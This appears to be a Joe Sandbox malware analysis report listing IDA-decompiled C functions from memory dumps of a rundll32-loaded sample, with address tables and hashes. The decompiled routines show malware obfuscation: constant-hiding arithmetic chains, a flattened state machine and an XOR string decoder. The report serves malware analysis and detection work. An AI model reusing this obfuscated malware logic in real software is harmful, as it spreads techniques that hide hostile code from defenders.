                                                                                                                      0x002b7985
                                                                                                                      0x00000000
                                                                                                                      0x002b798b
                                                                                                                      0x002b798f
                                                                                                                      0x002b7991
                                                                                                                      0x002b7994
                                                                                                                      0x00000000
                                                                                                                      0x002b7994
                                                                                                                      0x002b7985
                                                                                                                      0x002b797d
                                                                                                                      0x002b7979
                                                                                                                      0x002b7971
                                                                                                                      0x002b7a38
                                                                                                                      0x002b7a3a
                                                                                                                      0x002b7a3f
                                                                                                                      0x002b7a3f
                                                                                                                      0x002b7a46
                                                                                                                      0x002b7a46
                                                                                                                      0x002b7a02
                                                                                                                      0x002b7a07
                                                                                                                      0x002b7a0a
                                                                                                                      0x002b7a0f
                                                                                                                      0x002b7a0f
                                                                                                                      0x002b7a0f
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ':W$V
                                                                                                                      • API String ID: 0-741684166
                                                                                                                      • Opcode ID: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction ID: 875be9c42ce7875ef5b072345f9938c46be6840d3acf6f8d8af5e92f8e384e49
                                                                                                                      • Opcode Fuzzy Hash: 9df797d2c0240c8d82362af42228f8b3359936822f393b3d4966278af40eae7f
                                                                                                                      • Instruction Fuzzy Hash: 40615571109342AFC768CF21C98A95BBBF1FBC8358F509A1CF1DA96220D3758A19CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CEBFF Relevance: 2.6, Strings: 2, Instructions: 129COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002CEBFF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* _t91;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t114;
				void* _t116;
				void* _t131;
				void* _t132;

				_push(_a12);
				_t131 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t91);
				_v28 = 0x7108be;
				_v28 = _v28 + 0x734d;
				_v28 = _v28 + 0xa8e4;
				_t132 = 0;
				_v28 = _v28 + 0xffff8493;
				_t114 = 0xcca5bf9;
				_v28 = _v28 ^ 0x0074778b;
				_v20 = 0xc2a60c;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x558996ec;
				_v20 = _v20 ^ 0x55851de9;
				_v12 = 0x41ee29;
				_t21 =  &_v12; // 0x41ee29
				_t109 = 0x29;
				_v12 =  *_t21 * 0x26;
				_v12 = _v12 ^ 0x09c82f39;
				_v32 = 0x1f5650;
				_v32 = _v32 >> 1;
				_v32 = _v32 / _t109;
				_v32 = _v32 ^ 0xe76a4887;
				_v32 = _v32 ^ 0xe76186a0;
				_v36 = 0x15f4a6;
				_v36 = _v36 | 0x84842460;
				_v36 = _v36 + 0x9b66;
				_t110 = 0x43;
				_v36 = _v36 / _t110;
				_v36 = _v36 ^ 0x01f36aaa;
				_v4 = 0xe58fa8;
				_v4 = _v4 >> 0xf;
				_v4 = _v4 ^ 0x0008ca28;
				_v8 = 0x294ac3;
				_v8 = _v8 + 0xffff78db;
				_v8 = _v8 ^ 0x0024bdda;
				_v16 = 0xcf6d8f;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0x1116;
				_v16 = _v16 ^ 0x000942b4;
				_v24 = 0xd07c42;
				_v24 = _v24 | 0x50b68ca9;
				_t111 = 0x74;
				_v24 = _v24 / _t111;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x05925fb7;
				while(_t114 != 0x2cca53b) {
					if(_t114 == 0x3850c59) {
						E002B68DE(_v4, _v8, _v16, _v24,  *0x2d5214);
					} else {
						if(_t114 == 0xcca5bf9) {
							_push(_t114);
							_push(_t114);
							_t116 = 0x50;
							 *0x2d5214 = E002C3512(_t116);
							_t114 = 0xd9a7a55;
							continue;
						} else {
							if(_t114 == 0xd96b1a6) {
								_t132 = E002CEE11(_t131, _v32, _v36, _a8);
								if(_t132 == 0) {
									_t114 = 0x2cca53b;
									continue;
								}
							} else {
								if(_t114 != 0xd9a7a55) {
									L12:
									if(_t114 != 0xca68b5e) {
										continue;
									} else {
									}
								} else {
									if(E002D0D5B() != 0) {
										_t114 = 0xd96b1a6;
										continue;
									}
								}
							}
						}
					}
					return _t132;
				}
				E002B6D80();
				_t114 = 0x3850c59;
				goto L12;
			}




















                                                                                                                      0x002cec06
                                                                                                                      0x002cec0a
                                                                                                                      0x002cec0c
                                                                                                                      0x002cec10
                                                                                                                      0x002cec14
                                                                                                                      0x002cec15
                                                                                                                      0x002cec16
                                                                                                                      0x002cec1b
                                                                                                                      0x002cec26
                                                                                                                      0x002cec30
                                                                                                                      0x002cec38
                                                                                                                      0x002cec3a
                                                                                                                      0x002cec42
                                                                                                                      0x002cec47
                                                                                                                      0x002cec54
                                                                                                                      0x002cec5c
                                                                                                                      0x002cec61
                                                                                                                      0x002cec69
                                                                                                                      0x002cec71
                                                                                                                      0x002cec79
                                                                                                                      0x002cec80
                                                                                                                      0x002cec83
                                                                                                                      0x002cec87
                                                                                                                      0x002cec8f
                                                                                                                      0x002cec97
                                                                                                                      0x002ceca3
                                                                                                                      0x002ceca7
                                                                                                                      0x002cecaf
                                                                                                                      0x002cecb7
                                                                                                                      0x002cecbf
                                                                                                                      0x002cecc7
                                                                                                                      0x002cecd3
                                                                                                                      0x002cecd8
                                                                                                                      0x002cecde
                                                                                                                      0x002cece6
                                                                                                                      0x002cecee
                                                                                                                      0x002cecf3
                                                                                                                      0x002cecfb
                                                                                                                      0x002ced03
                                                                                                                      0x002ced0b
                                                                                                                      0x002ced13
                                                                                                                      0x002ced1b
                                                                                                                      0x002ced20
                                                                                                                      0x002ced28
                                                                                                                      0x002ced30
                                                                                                                      0x002ced38
                                                                                                                      0x002ced44
                                                                                                                      0x002ced4c
                                                                                                                      0x002ced50
                                                                                                                      0x002ced55
                                                                                                                      0x002ced5d
                                                                                                                      0x002ced63
                                                                                                                      0x002cedff
                                                                                                                      0x002ced69
                                                                                                                      0x002ced6f
                                                                                                                      0x002cedbc
                                                                                                                      0x002cedbd
                                                                                                                      0x002cedc0
                                                                                                                      0x002cedc8
                                                                                                                      0x002cedcd
                                                                                                                      0x00000000
                                                                                                                      0x002ced71
                                                                                                                      0x002ced77
                                                                                                                      0x002ceda4
                                                                                                                      0x002cedaa
                                                                                                                      0x002cedac
                                                                                                                      0x00000000
                                                                                                                      0x002cedac
                                                                                                                      0x002ced79
                                                                                                                      0x002ced7f
                                                                                                                      0x002ceddb
                                                                                                                      0x002cede1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002cede7
                                                                                                                      0x002ced81
                                                                                                                      0x002ced88
                                                                                                                      0x002ced8a
                                                                                                                      0x00000000
                                                                                                                      0x002ced8a
                                                                                                                      0x002ced88
                                                                                                                      0x002ced7f
                                                                                                                      0x002ced77
                                                                                                                      0x002ced6f
                                                                                                                      0x002cee10
                                                                                                                      0x002cee10
                                                                                                                      0x002cedd4
                                                                                                                      0x002cedd9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )A$Ms
                                                                                                                      • API String ID: 0-3843022149
                                                                                                                      • Opcode ID: 7f1d408d93160338bfdce28dd4f1e9c67986923c2f94590ca3c85359a64bbacc
                                                                                                                      • Instruction ID: 8b79118d6217d91361f274696f4cef7c9c98392737b9adba96c1905789c34fd7
                                                                                                                      • Opcode Fuzzy Hash: 7f1d408d93160338bfdce28dd4f1e9c67986923c2f94590ca3c85359a64bbacc
                                                                                                                      • Instruction Fuzzy Hash: AD5157715193019FCB08CE26D88991FBBE1EBC8758F118A1DF58656260D371DA5A8F83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002D1993 Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002D1993(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t120;
				signed int _t126;
				signed int _t127;
				intOrPtr _t138;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(0x104);
				_v68 = 0x5658b2;
				_t138 = 0;
				_v64 = 0x871b59;
				_v60 = 0xa8976a;
				_v56 = 0;
				_v40 = 0xee5304;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 ^ 0x00002b94;
				_v24 = 0xe2229b;
				_v24 = _v24 >> 2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xe22b2fd9;
				_v8 = 0x13a34a;
				_t126 = 0x7b;
				_v8 = _v8 * 0x58;
				_v8 = _v8 * 0x7c;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x01172ec8;
				_v16 = 0x4f354;
				_t127 = 0x1c;
				_v16 = _v16 / _t126;
				_v16 = _v16 | 0x38cda962;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x66d4d439;
				_v12 = 0x949837;
				_v12 = _v12 ^ 0x28b93813;
				_v12 = _v12 + 0xffff414d;
				_v12 = _v12 + 0xcc4e;
				_v12 = _v12 ^ 0x282f8cad;
				_v44 = 0x4b103d;
				_v44 = _v44 + 0xffffdccd;
				_v44 = _v44 ^ 0x0043fba2;
				_v28 = 0xbeb96;
				_v28 = _v28 + 0xffffd9aa;
				_v28 = _v28 >> 0xd;
				_v28 = _v28 ^ 0x000a38bb;
				_v48 = 0xb1bdc9;
				_v48 = _v48 + 0x24fd;
				_v48 = _v48 ^ 0x00b0c363;
				_v36 = 0x53e429;
				_v36 = _v36 + 0xffff530c;
				_v36 = _v36 / _t127;
				_v36 = _v36 ^ 0x0005d2bf;
				_v20 = 0xb0734b;
				_v20 = _v20 | 0x98e9e8ae;
				_v20 = _v20 + 0x857e;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0xc7d86034;
				_v32 = 0x655a5c;
				_v32 = _v32 >> 8;
				_v32 = _v32 | 0x0e60c7ff;
				_v32 = _v32 ^ 0x0e677ecd;
				_t120 = E002C3C1B(_t127, _a16, _v40);
				_t137 = _t120;
				if(_t120 != 0) {
					_t138 = E002C1785(_a4, _v16, _v12, _t127, _v44, _t137, _v28,  &_v52);
					E002C4DAD(_v48, _v36, _t137, _v20, _v32);
				}
				return _t138;
			}























                                                                                                                      0x002d199b
                                                                                                                      0x002d19a3
                                                                                                                      0x002d19a6
                                                                                                                      0x002d19a9
                                                                                                                      0x002d19aa
                                                                                                                      0x002d19ad
                                                                                                                      0x002d19ae
                                                                                                                      0x002d19af
                                                                                                                      0x002d19b4
                                                                                                                      0x002d19bb
                                                                                                                      0x002d19bd
                                                                                                                      0x002d19c7
                                                                                                                      0x002d19d0
                                                                                                                      0x002d19d3
                                                                                                                      0x002d19da
                                                                                                                      0x002d19de
                                                                                                                      0x002d19e5
                                                                                                                      0x002d19ec
                                                                                                                      0x002d19f0
                                                                                                                      0x002d19f4
                                                                                                                      0x002d19fb
                                                                                                                      0x002d1a08
                                                                                                                      0x002d1a0b
                                                                                                                      0x002d1a12
                                                                                                                      0x002d1a15
                                                                                                                      0x002d1a19
                                                                                                                      0x002d1a20
                                                                                                                      0x002d1a2c
                                                                                                                      0x002d1a2d
                                                                                                                      0x002d1a32
                                                                                                                      0x002d1a39
                                                                                                                      0x002d1a3d
                                                                                                                      0x002d1a44
                                                                                                                      0x002d1a4b
                                                                                                                      0x002d1a52
                                                                                                                      0x002d1a59
                                                                                                                      0x002d1a60
                                                                                                                      0x002d1a67
                                                                                                                      0x002d1a6e
                                                                                                                      0x002d1a75
                                                                                                                      0x002d1a7c
                                                                                                                      0x002d1a83
                                                                                                                      0x002d1a8a
                                                                                                                      0x002d1a8e
                                                                                                                      0x002d1a95
                                                                                                                      0x002d1a9c
                                                                                                                      0x002d1aa3
                                                                                                                      0x002d1aaa
                                                                                                                      0x002d1ab1
                                                                                                                      0x002d1abd
                                                                                                                      0x002d1ac0
                                                                                                                      0x002d1ac7
                                                                                                                      0x002d1ace
                                                                                                                      0x002d1ad5
                                                                                                                      0x002d1adc
                                                                                                                      0x002d1ae0
                                                                                                                      0x002d1ae7
                                                                                                                      0x002d1aee
                                                                                                                      0x002d1af2
                                                                                                                      0x002d1af9
                                                                                                                      0x002d1b0d
                                                                                                                      0x002d1b15
                                                                                                                      0x002d1b19
                                                                                                                      0x002d1b38
                                                                                                                      0x002d1b44
                                                                                                                      0x002d1b49
                                                                                                                      0x002d1b53

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )S$\Ze
                                                                                                                      • API String ID: 0-2852868822
                                                                                                                      • Opcode ID: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction ID: 105909a55c8e425be0aa7aaf09fd0d731b0291631c050f8b3f23c8ea646ff5b9
                                                                                                                      • Opcode Fuzzy Hash: 14dd94e2abf50960c8006a45da92ac01b723b2d7fa089378cd4194b745656b67
                                                                                                                      • Instruction Fuzzy Hash: 0F5102B2C00209EBCF49DFE5D98A8EEFBB1FB48704F208159E511B6210D3B54A59CFA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BBB4B Relevance: 2.6, Strings: 2, Instructions: 91COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002BBB4B(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t50;
				signed int _t52;
				unsigned int* _t65;
				signed int _t66;
				signed int _t68;
				signed int _t75;
				unsigned int _t76;
				unsigned int _t77;
				unsigned int* _t80;
				signed int* _t81;
				signed int* _t82;
				unsigned int _t84;
				void* _t90;
				void* _t92;
				void* _t94;
				void* _t95;

				_push( *((intOrPtr*)(_t94 + 0x18)));
				_push( *(_t94 + 0x24));
				_push(__ecx);
				_t50 = E002BCF25( *((intOrPtr*)(_t94 + 0x18)));
				 *(_t94 + 0x20) = 0xfe2925;
				_t4 =  &(_t50[1]); // 0x4
				_t81 = _t4;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x7128;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0x09a7dad2;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0xffff7390;
				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09fc0087;
				 *(_t94 + 0x1c) = 0x6df10d;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) << 0xa;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0xffff9bae;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) + 0x6e9b;
				 *(_t94 + 0x1c) =  *(_t94 + 0x1c) ^ 0xb7c65291;
				 *(_t94 + 0x34) = 0x26c28e;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x9999;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x5997;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) + 0x3e8;
				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0x0028604d;
				_t68 =  *_t50;
				_t82 =  &(_t81[1]);
				_t52 =  *_t81 ^ _t68;
				 *(_t94 + 0x24) = _t68;
				 *(_t94 + 0x28) = _t52;
				_t33 = _t52 + 1; // 0x1
				_t84 =  !=  ? (_t33 & 0xfffffffc) + 4 : _t33;
				_t95 = _t94 + 8;
				_t65 = E002C3512(_t84);
				 *(_t95 + 0x2c) = _t65;
				if(_t65 != 0) {
					_t92 = 0;
					_t80 = _t65;
					_t90 =  >  ? 0 :  &(_t82[_t84 >> 2]) - _t82 + 3 >> 2;
					if(_t90 != 0) {
						_t66 =  *(_t95 + 0x18);
						do {
							_t75 =  *_t82;
							_t82 =  &(_t82[1]);
							_t76 = _t75 ^ _t66;
							 *_t80 = _t76;
							_t80 =  &(_t80[1]);
							_t77 = _t76 >> 0x10;
							 *((char*)(_t80 - 3)) = _t76 >> 8;
							 *(_t80 - 2) = _t77;
							_t92 = _t92 + 1;
							 *((char*)(_t80 - 1)) = _t77 >> 8;
						} while (_t92 < _t90);
						_t65 =  *(_t95 + 0x28);
					}
					 *((char*)(_t65 +  *((intOrPtr*)(_t95 + 0x1c)))) = 0;
				}
				return _t65;
			}



















                                                                                                                      0x002bbb55
                                                                                                                      0x002bbb56
                                                                                                                      0x002bbb5b
                                                                                                                      0x002bbb5c
                                                                                                                      0x002bbb61
                                                                                                                      0x002bbb69
                                                                                                                      0x002bbb69
                                                                                                                      0x002bbb6c
                                                                                                                      0x002bbb74
                                                                                                                      0x002bbb7c
                                                                                                                      0x002bbb84
                                                                                                                      0x002bbb8c
                                                                                                                      0x002bbb94
                                                                                                                      0x002bbb99
                                                                                                                      0x002bbba1
                                                                                                                      0x002bbba9
                                                                                                                      0x002bbbb1
                                                                                                                      0x002bbbb9
                                                                                                                      0x002bbbc1
                                                                                                                      0x002bbbc9
                                                                                                                      0x002bbbd1
                                                                                                                      0x002bbbd9
                                                                                                                      0x002bbbdd
                                                                                                                      0x002bbbe0
                                                                                                                      0x002bbbe2
                                                                                                                      0x002bbbe6
                                                                                                                      0x002bbbea
                                                                                                                      0x002bbbfa
                                                                                                                      0x002bbc05
                                                                                                                      0x002bbc13
                                                                                                                      0x002bbc15
                                                                                                                      0x002bbc1d
                                                                                                                      0x002bbc25
                                                                                                                      0x002bbc27
                                                                                                                      0x002bbc38
                                                                                                                      0x002bbc3d
                                                                                                                      0x002bbc3f
                                                                                                                      0x002bbc43
                                                                                                                      0x002bbc43
                                                                                                                      0x002bbc45
                                                                                                                      0x002bbc48
                                                                                                                      0x002bbc4a
                                                                                                                      0x002bbc51
                                                                                                                      0x002bbc54
                                                                                                                      0x002bbc57
                                                                                                                      0x002bbc5a
                                                                                                                      0x002bbc60
                                                                                                                      0x002bbc61
                                                                                                                      0x002bbc64
                                                                                                                      0x002bbc68
                                                                                                                      0x002bbc68
                                                                                                                      0x002bbc71
                                                                                                                      0x002bbc71
                                                                                                                      0x002bbc7d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (q$M`(
                                                                                                                      • API String ID: 0-2580875808
                                                                                                                      • Opcode ID: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction ID: 87f053ad9e0b77dc2265ade498515ec88ef29a7164ecf0f810bd81458a48ee9a
                                                                                                                      • Opcode Fuzzy Hash: e568486319296607ca6dea0e37a98f8cfb4649cfeb7f911281b771a3c76faa87
                                                                                                                      • Instruction Fuzzy Hash: 38319972A093028FD344CF28C88445AFBE0FF98718F454A5DF88997242DB74EA19CB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BF154 Relevance: 2.6, Strings: 2, Instructions: 90COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E002BF154(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v576;
				void* _t83;
				intOrPtr* _t85;
				signed int _t89;

				_v56 = 0xd50633;
				_v52 = 0xe1ee45;
				_v44 = 0;
				_v48 = 0;
				_v24 = 0xad73ca;
				_v24 = _v24 ^ 0x73620612;
				_v24 = _v24 ^ 0x73c7a99a;
				_v32 = 0x597259;
				_t89 = 0x52;
				_push(_t89);
				_v32 = _v32 / _t89;
				_v32 = _v32 ^ 0x0009f267;
				_v20 = 0xd3cfac;
				_v20 = _v20 << 9;
				_v20 = _v20 | 0x4896bc35;
				_v20 = _v20 ^ 0xef9372aa;
				_v28 = 0xdbc61e;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x01b432fd;
				_v16 = 0x90d5a3;
				_v16 = _v16 + 0xffffb729;
				_v16 = _v16 + 0xffff3d25;
				_v16 = _v16 ^ 0x0089c5ce;
				_v8 = 0xd44b29;
				_v8 = _v8 + 0x631b;
				_v8 = _v8 | 0x8b07e3a3;
				_v8 = _v8 * 0x62;
				_v8 = _v8 ^ 0x88a24378;
				_v12 = 0x36955e;
				_v12 = _v12 + 0xb114;
				_v12 = _v12 + 0xffffe207;
				_v12 = _v12 ^ 0x0030a900;
				_v36 = 0x9daa5e;
				_v36 = _v36 + 0xffffbce6;
				_v36 = _v36 ^ 0x0093fbb5;
				_v40 = 0x60d009;
				_v40 = _v40 >> 1;
				_v40 = _v40 ^ 0x003d09ba;
				_t96 = _v24;
				_t83 = E002B5C03( &_v576, _v24, _v32);
				_pop(0);
				if(_t83 != 0) {
					_t85 =  &_v576;
					if(_v576 != 0) {
						while( *_t85 != 0x5c) {
							_t85 = _t85 + 2;
							if( *_t85 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						 *((short*)(_t85 + 2)) = 0;
					}
					L6:
					_push(0);
					_push(0);
					E002B884A(_v20, _t96, _v28, _v16, 0, _v8, 0, _v12,  &_v576, _v36, 0,  &_v44, _v40);
				}
				return _v44;
			}




















                                                                                                                      0x002bf15d
                                                                                                                      0x002bf166
                                                                                                                      0x002bf170
                                                                                                                      0x002bf173
                                                                                                                      0x002bf176
                                                                                                                      0x002bf17d
                                                                                                                      0x002bf184
                                                                                                                      0x002bf18b
                                                                                                                      0x002bf197
                                                                                                                      0x002bf19a
                                                                                                                      0x002bf19b
                                                                                                                      0x002bf1a4
                                                                                                                      0x002bf1ab
                                                                                                                      0x002bf1b2
                                                                                                                      0x002bf1b6
                                                                                                                      0x002bf1bd
                                                                                                                      0x002bf1c4
                                                                                                                      0x002bf1cb
                                                                                                                      0x002bf1ce
                                                                                                                      0x002bf1d5
                                                                                                                      0x002bf1dc
                                                                                                                      0x002bf1e3
                                                                                                                      0x002bf1ea
                                                                                                                      0x002bf1f1
                                                                                                                      0x002bf1f8
                                                                                                                      0x002bf1ff
                                                                                                                      0x002bf20a
                                                                                                                      0x002bf20d
                                                                                                                      0x002bf214
                                                                                                                      0x002bf21b
                                                                                                                      0x002bf222
                                                                                                                      0x002bf229
                                                                                                                      0x002bf230
                                                                                                                      0x002bf237
                                                                                                                      0x002bf23e
                                                                                                                      0x002bf245
                                                                                                                      0x002bf24c
                                                                                                                      0x002bf24f
                                                                                                                      0x002bf259
                                                                                                                      0x002bf25c
                                                                                                                      0x002bf262
                                                                                                                      0x002bf265
                                                                                                                      0x002bf267
                                                                                                                      0x002bf274
                                                                                                                      0x002bf276
                                                                                                                      0x002bf27c
                                                                                                                      0x002bf282
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002bf284
                                                                                                                      0x00000000
                                                                                                                      0x002bf282
                                                                                                                      0x002bf288
                                                                                                                      0x002bf288
                                                                                                                      0x002bf28c
                                                                                                                      0x002bf28c
                                                                                                                      0x002bf28d
                                                                                                                      0x002bf2b1
                                                                                                                      0x002bf2b6
                                                                                                                      0x002bf2c0

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E$YrY
                                                                                                                      • API String ID: 0-1711274510
                                                                                                                      • Opcode ID: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction ID: de5df10244a724c767f3286296383f51ce8cb4698ddaf5dd2a153a62ed8e9049
                                                                                                                      • Opcode Fuzzy Hash: 8312f07bc65dbe4574ba273e034b45cddb48f3c575f5b78e5fcdda2b4a27f55a
                                                                                                                      • Instruction Fuzzy Hash: 1041F372C1121EABCF59CFE4C94A9EEBBB5FF04304F108199D411B62A0E3B51A54DF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443420107.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443430330.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443436551.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443461600.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 431132790-0
                                                                                                                      • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                      • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                      • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443385226.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
